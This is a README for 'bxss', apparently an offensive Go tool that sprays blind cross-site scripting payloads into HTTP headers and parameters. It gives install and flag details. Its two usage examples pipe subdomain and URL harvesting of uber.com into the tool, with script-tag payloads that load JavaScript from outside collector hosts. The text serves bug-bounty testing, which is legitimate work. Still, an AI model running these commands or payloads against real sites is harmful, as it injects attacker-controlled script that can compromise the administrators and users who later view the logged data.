Features
- Inject Blind XSS payloads into custom headers
- Inject Blind XSS payloads into parameters
- Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
- Tool Chaining
- Really fast
- Easy to setup
Install
$ go get -u github.com/ethicalhackingplayground/bxss
Arguments
____
| _ \
| |_) |_ _____ ___
| _ <\ \/ / __/ __|
| |_) |> <\__ \__ \
|____//_/\_\___/___/
-- Coded by @z0idsec --
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default "User-Agent")
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload
Blind XSS In Parameters
$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"